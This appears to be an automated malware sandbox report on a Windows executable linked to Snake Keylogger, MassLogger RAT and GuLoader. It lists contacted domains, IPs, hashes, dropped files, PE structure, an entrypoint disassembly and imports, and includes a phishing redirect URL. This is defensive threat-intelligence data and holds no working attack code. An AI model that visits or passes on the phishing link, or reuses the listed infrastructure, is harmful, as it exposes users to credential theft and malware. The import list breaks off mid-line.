Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
mail.starofseasmarine.com	NOAH $$$$.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	166.62.28.135
	Swift Detail 103.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	166.62.28.135
	z1PurchaseOrder.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	166.62.28.135
checkip.dyndns.com	rXKfKM0T49.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73
	4Vx2rUlb0f.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	Yef4EqsQha.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	b5BQbAhwVD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.8.169
	UF7jzc7ETP.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	9Yn5tjyOgT.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73
	VQsnGWaNi5.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	6ZoBPR3isG.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73
	JgE2YgxSzB.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	lsc5QN46NH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
reallyfreegeoip.org	rXKfKM0T49.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.96.1
	4Vx2rUlb0f.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.112.1
	Yef4EqsQha.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	b5BQbAhwVD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.80.1
	UF7jzc7ETP.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1
	9Yn5tjyOgT.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.32.1
	VQsnGWaNi5.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1
	6ZoBPR3isG.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.80.1
	JgE2YgxSzB.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.16.1
	lsc5QN46NH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
api.telegram.org	rXKfKM0T49.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	4Vx2rUlb0f.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Yef4EqsQha.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	b5BQbAhwVD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	9Yn5tjyOgT.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	6ZoBPR3isG.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	JgE2YgxSzB.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	lsc5QN46NH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	V7OHj6ISEo.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	2CQ2zMn0hb.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	rXKfKM0T49.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	4Vx2rUlb0f.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Yef4EqsQha.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	b5BQbAhwVD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	9Yn5tjyOgT.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	6ZoBPR3isG.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	JgE2YgxSzB.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	lsc5QN46NH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	V7OHj6ISEo.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	2CQ2zMn0hb.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
CLOUDFLARENETUS	rXKfKM0T49.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.96.1
	4Vx2rUlb0f.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.112.1
	gH3LlhcRzg.exe	Get hash	malicious	FormBook	Browse	104.21.96.1
	Yef4EqsQha.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	M7XS5C07kV.exe	Get hash	malicious	FormBook	Browse	172.67.186.192
	b5BQbAhwVD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.80.1
	UF7jzc7ETP.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1
	9Yn5tjyOgT.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.32.1
	VQsnGWaNi5.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1
	6ZoBPR3isG.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.80.1
ORACLE-BMC-31898US	Yef4EqsQha.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	b5BQbAhwVD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	158.101.44.242
	VQsnGWaNi5.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	lsc5QN46NH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	SABXJ1B5c8.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	xXUnP7uCBJ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	193.122.6.168
	4UQ5wnI389.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	158.101.44.242
	ajRZflJ2ch.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	193.122.6.168
	hZbkP3TJBJ.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	9L83v5j083.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
AS-26496-GO-DADDY-COM-LLCUS	zYj1wg0cM2.doc	Get hash	malicious	DBatLoader	Browse	166.62.27.188
	https://jmak-service.com/3225640388	Get hash	malicious	HTMLPhisher	Browse	107.180.119.1
	https://www.google.com/url?q=YG2GERTSbxgfeaGh1Yi5pby8yODY0MDkxOTEyNjI3MjNkMzQzMGNlYjE1ZTRjZjNlZWUwMTM5NGMyMDk3MmRmYTllZTBkMzUzMDBlZDFjOWNjMjdhNWZiYmM0OTU1ODkzMjEyMjI5MjAwOTkviinbsewtyuas53D1e4a0cefd8db4ad28e54c10117f7d498%2526i%253DNjI2YjE3MTBiZWI4YTgxMWUwNDIxNzE3%2526p%253Dm%2526s%253DAVNPUEhUT0NFTkNSWVBUSVYmhcLGCIsQzpMqHgYCBBo2kwEPWKEfFaahaLsnpofO4A%2526t%253DM3dHV0ZCT2t4azAvRVhKQ3B1ZC95RFFTdmpSMCt3cEFxWHJocUMzM0EyZz0%25253D%2526u%253DaHR0cHM6Ly9tLmV4YWN0YWcuY29tL2NsLmFzcHg_ZXh0UHJvdkFwaT1zaXh0L&sa=t&url=amp%2Fdlocumndjkacheckckoqingnmlcsoftlineon-secure-portal.us-iad-10.linodeobjects.com/newdocusign.html#Tdcjoiletuzn43fqnlhtwn8dbfakjhsdbfjhasbdfkjasbdkf%20ashjdbaksdbfkjasbdbfad	Get hash	malicious	Unknown	Browse	208.109.228.27
	ENQ-0092025.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	166.62.27.188
	yxU3AgeVTi.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	166.62.27.188
	ITT # KRPBV2663 .doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	166.62.27.188
	PI ITS15235.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	166.62.27.188
	fuckunix.arm.elf	Get hash	malicious	Mirai	Browse	50.62.7.191
	Josho.x86.elf	Get hash	malicious	Unknown	Browse	72.167.237.175
	DRlFlg7OV8.lnk	Get hash	malicious	Unknown	Browse	166.62.28.147

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	rXKfKM0T49.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.80.1
	4Vx2rUlb0f.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.80.1
	Yef4EqsQha.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	b5BQbAhwVD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.80.1
	UF7jzc7ETP.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.80.1
	9Yn5tjyOgT.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.80.1
	VQsnGWaNi5.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
	6ZoBPR3isG.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.80.1
	JgE2YgxSzB.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	lsc5QN46NH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
3b5074b1b5d032e5620f69f9f700ff0e	rXKfKM0T49.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	4Vx2rUlb0f.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Yef4EqsQha.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	3j7f6Bv4FT.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	3j7f6Bv4FT.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	b5BQbAhwVD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	9Yn5tjyOgT.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	iRmpdWgpoF.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	6ZoBPR3isG.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	iRmpdWgpoF.exe	Get hash	malicious	Unknown	Browse	149.154.167.220

Process:	C:\Users\user\Desktop\C5JLkBS1CX.exe
File Type:	data
Category:	dropped
Size (bytes):	248832
Entropy (8bit):	7.867781206560433
Encrypted:	false
SSDEEP:	3072:7NNkiDNb9vIb/C7zgRI26ZX9Mra0pf3CzIiX1GWxkE8wOLeiekAOt/Q1wXy9K6U3:7NNJk/C78R8XyrdtCn1RGQ1NZULj
MD5:	5F1E12C75858A669A35AF61B78FB3B4F
SHA1:	0FE0D6C9C4A1CB6986079746054BFA7C5EB1E317
SHA-256:	F5F5560B2282980194EE36A642EA17F411F4591FB70E2FA1F4196DB830A4C73C
SHA-512:	7602BF349159A196CCA10DB921D2F323B4B0403B66862480D0558A730BE98510F8A46F1D76ABCCA8E75BF22963B3FDD449FDA0AB72BD0CDF347DB240E2471F17
Malicious:	false
Reputation:	low
Preview:	...Z75JPALLA..5W.1EJXZ45.PELLAJY5WK1EJXZ45JPELLAJY5WK1EJXZ45.PELB^.W5.B.d.Y....8,?l186R%\e)94ZZ>p')l3?7.>%....zYZ.5kAAKnY5WK1EJ0J..f!.2`0.'.&.Owi'$.D..N..?a(.)g@.4.+.Kxs+2P0.'.t"O.;.$..1.h=.?.0V?g@.4XZ45JPELLAJY5WK1...<45JP..LA.X1W?.E.XZ45JPEL.AiX>VB1E.YZ4.HPELLAe.5WK!EJX.55JP.LLQJY5UK1@JXZ45JP@LLAJY5WK!AJX^45.kGLNAJ.5W[1EZXZ45ZPE\LAJY5W[1EJXZ45JPEL.THYeWK1EZZ..KPELLAJY5WK1EJXZ45JPELLAJY..J1YJXZ45JPELLAJY5WK1EJXZ45JPEL.LHYuWK1EJXZ45JPE.MA.X5WK1EJXZ45JPELLAJY5WK1EJXZ.A/(1LLAR.4WK!EJX.55JTELLAJY5WK1EJXZ.5J0k>( >85W.\EJX.55J>ELL.KY5WK1EJXZ45JP.LL.d=T#*1EJ.j45JpGLLWJY5]I1EJXZ45JPELLA.Y5.eC68;Z45..DLL!HY5.J1EjZZ45JPELLAJY5W.1E.XZ45JPELLAJY5WK1EJXZ45JPELLAJY5WK1EJXZ45JPELLAJY5WK1EJXZ45JPELLAJY5WK1EJXZ45JPELLAJY5WK1EJXZ45JPELLAJY5WK1EJXZ45JPELLAJY5WK1EJXZ45JPELLAJY5WK1EJXZ45JPELLAJY5WK1EJXZ45JPELLAJY5WK1EJXZ45JPELLAJY5WK1EJXZ45JPELLAJY5WK1EJXZ45JPELLAJY5WK1EJXZ45JPELLAJY5WK1EJXZ45JPELLAJY5WK1EJXZ45JPELLAJY5WK1EJXZ45JPELLAJY5WK1EJXZ45JPELLAJY5WK1EJXZ45JPELLAJY5WK1EJXZ45JPELLAJY5WK1EJXZ45JPEL

C:\Users\user\AppData\Local\Temp\autBA82.tmp

Download File

Process:	C:\Users\user\Desktop\C5JLkBS1CX.exe
File Type:	data
Category:	dropped
Size (bytes):	245872
Entropy (8bit):	7.983760651911076
Encrypted:	false
SSDEEP:	6144:5YTXPxCV5Gp0Zt4sX8TLP4zgyrjO2vMA1CoWueeoqN0mf42U6:0PxCV0if4sXMLg0KM/neo7mf42
MD5:	D511752C397FA007B00B7A8D3AB69AF6
SHA1:	D6C61971779C95546BF2E6BCB49E178CEA15E0E5
SHA-256:	6E5F552EC2488BC6C74378D8E279A6766318CB0EB1A50254B22D5EE624A35D6D
SHA-512:	5EA7AC78AB0F653CF33F8418B4F57F567030CB660DE790F6757D31FA90C94B5B8711BB0ED0750DCD1E3D9C6FED801587B8E9F5ABA4B5DD512B234217BF6F5AEC
Malicious:	false
Reputation:	low
Preview:	EA06.....D9....P..)....kW..h...ji5.T(..E.5.....J...5@.E....\|t/..Y.~b....l..&.),..e..f.....'..&s..V}%..`...f.....4.]..#3.V.1f...V...O..hi.{L.I..h%...v.a.w.6z..i....w...eP.$ .I.?.;.I .i...=.O......@...(.<.?.<..b..e..X....J,h..Z....>.P.4^.f.4......P...l....!..S ..V.1..~f.......X.M&..]..N..3Z.ncE...5.....I......JEf....U..~....}\|..d.....}..Ef..%..6....}....Q1..\...8@..P...MiS.\.Q .N&...p..3..C.K.~..C...{T......H.Q...A]..?\|..../e.....#...S)..Efk..Lh.........a@._h........i.Z..e...d...g5.j....b........3....sx..'...~?8l.'...S.7J.;.;._t....E.R.1...Q....c..../.._.z..D......;..X..2....3.lB.4.mu.Z...E..j...X.SfP..g..B..95}..V..U....4z.+Q............;07".P..(.]>....8.jl.....`.[.h(....KW._l4.....E.1.......f7\|.K..........w...2........N.Kb7~.:...V.ZEB...P...7[S...9......a..vBm.r....+-..W..:......Y4..E.g.<...5.O..;.._=.A...T".Y...../'m[..yR..~.4.i.7;_k..._.....U.....oX.~8qK.b..i.Z...1....zuC...cp._.o...a..T......W.6.Go...{.(..).....P....Fm...Yj.Q....

C:\Users\user\AppData\Local\Temp\autC947.tmp

Download File

Process:	C:\Users\user\Desktop\C5JLkBS1CX.exe
File Type:	data
Category:	dropped
Size (bytes):	245872
Entropy (8bit):	7.983760651911076
Encrypted:	false
SSDEEP:	6144:5YTXPxCV5Gp0Zt4sX8TLP4zgyrjO2vMA1CoWueeoqN0mf42U6:0PxCV0if4sXMLg0KM/neo7mf42
MD5:	D511752C397FA007B00B7A8D3AB69AF6
SHA1:	D6C61971779C95546BF2E6BCB49E178CEA15E0E5
SHA-256:	6E5F552EC2488BC6C74378D8E279A6766318CB0EB1A50254B22D5EE624A35D6D
SHA-512:	5EA7AC78AB0F653CF33F8418B4F57F567030CB660DE790F6757D31FA90C94B5B8711BB0ED0750DCD1E3D9C6FED801587B8E9F5ABA4B5DD512B234217BF6F5AEC
Malicious:	false
Reputation:	low
Preview:	EA06.....D9....P..)....kW..h...ji5.T(..E.5.....J...5@.E....\|t/..Y.~b....l..&.),..e..f.....'..&s..V}%..`...f.....4.]..#3.V.1f...V...O..hi.{L.I..h%...v.a.w.6z..i....w...eP.$ .I.?.;.I .i...=.O......@...(.<.?.<..b..e..X....J,h..Z....>.P.4^.f.4......P...l....!..S ..V.1..~f.......X.M&..]..N..3Z.ncE...5.....I......JEf....U..~....}\|..d.....}..Ef..%..6....}....Q1..\...8@..P...MiS.\.Q .N&...p..3..C.K.~..C...{T......H.Q...A]..?\|..../e.....#...S)..Efk..Lh.........a@._h........i.Z..e...d...g5.j....b........3....sx..'...~?8l.'...S.7J.;.;._t....E.R.1...Q....c..../.._.z..D......;..X..2....3.lB.4.mu.Z...E..j...X.SfP..g..B..95}..V..U....4z.+Q............;07".P..(.]>....8.jl.....`.[.h(....KW._l4.....E.1.......f7\|.K..........w...2........N.Kb7~.:...V.ZEB...P...7[S...9......a..vBm.r....+-..W..:......Y4..E.g.<...5.O..;.._=.A...T".Y...../'m[..yR..~.4.i.7;_k..._.....U.....oX.~8qK.b..i.Z...1....zuC...cp._.o...a..T......W.6.Go...{.(..).....P....Fm...Yj.Q....

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.1492414351448605
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	C5JLkBS1CX.exe
File size:	1'170'432 bytes
MD5:	65190ca2ca5f79e9f61cc56883158455
SHA1:	3c66b52af1d4ca0b06835198575737c82b0db864
SHA256:	2caa04a44473cabb6298e6ce1c313beafb4a942641aed58ef247bb901f7ea314
SHA512:	920fc879f4932647a9dbc8218c6606cfb1cf2aa681460dc4a4e8374eaed3060cdb3e39d6524a737006ad2f40dbb80e9a420ebd5ce3121dda39ab3307f3a7ca07
SSDEEP:	24576:uu6J33O0c+JY5UZ+XC0kGso6FaBNRZbciHTgnKzfpWY:gu0c++OCvkGs9FaBpbcdnNY
TLSH:	8945BE2263DDC360CB769173BF69B7016EBF7C610630B95B2F980D7DA950162222D7A3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x427dcd
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x67565213 [Mon Dec 9 02:12:35 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007F01F8E9FC9Ah
jmp 00007F01F8E92A64h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F01F8E92BEAh
cmp edi, eax
jc 00007F01F8E92F4Eh
bt dword ptr [004C31FCh], 01h
jnc 00007F01F8E92BE9h
rep movsb
jmp 00007F01F8E92EFCh
cmp ecx, 00000080h
jc 00007F01F8E92DB4h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F01F8E92BF0h
bt dword ptr [004BE324h], 01h
jc 00007F01F8E930C0h
bt dword ptr [004C31FCh], 00000000h
jnc 00007F01F8E92D8Dh
test edi, 00000003h
jne 00007F01F8E92D9Eh
test esi, 00000003h
jne 00007F01F8E92D7Dh
bt edi, 02h
jnc 00007F01F8E92BEFh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F01F8E92BF3h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F01F8E92C45h
bt esi, 03h
jnc 00007F01F8E92C98h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD4 build 31101
[RES] VS2013 build 21005
[LNK] VS2013 UPD4 build 31101

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xba44c	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc7000	0x55364	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x11d000	0x711c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4870	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dcc4	0x8de00	d28a820a1d9ff26cda02d12b888ba4b4	False	0.5728679102422908	data	6.676118058520316	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2e10e	0x2e200	79b14b254506b0dbc8cd0ad67fb70ad9	False	0.33535526761517614	OpenPGP Public Key	5.76010872795207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbe000	0x8f74	0x5200	9f9d6f746f1a415a63de45f8b7983d33	False	0.1017530487804878	data	1.198745897703538	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc7000	0x55364	0x55400	b0cf3479dd8d193ccd1a6e53f4b577d0	False	0.9231408082844574	data	7.883127347968825	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x11d000	0x711c	0x7200	6fcae3cbbf6bfbabf5ec5bbe7cf612c3	False	0.7650767543859649	data	6.779031650454199	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc75a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc76d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc77f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc7920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc7c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc7d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc8bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xc9480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xc99e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xcbf90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xcd038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xcd4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xcd4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcda84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xce110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xce5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xceb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcf1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcf660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcf7b8	0x4c629	data			1.0003387956135557
RT_GROUP_ICON	0x11bde4	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x11be5c	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x11be70	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x11be84	0x14	data	English	Great Britain	1.25
RT_VERSION	0x11be98	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x11bf74	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, 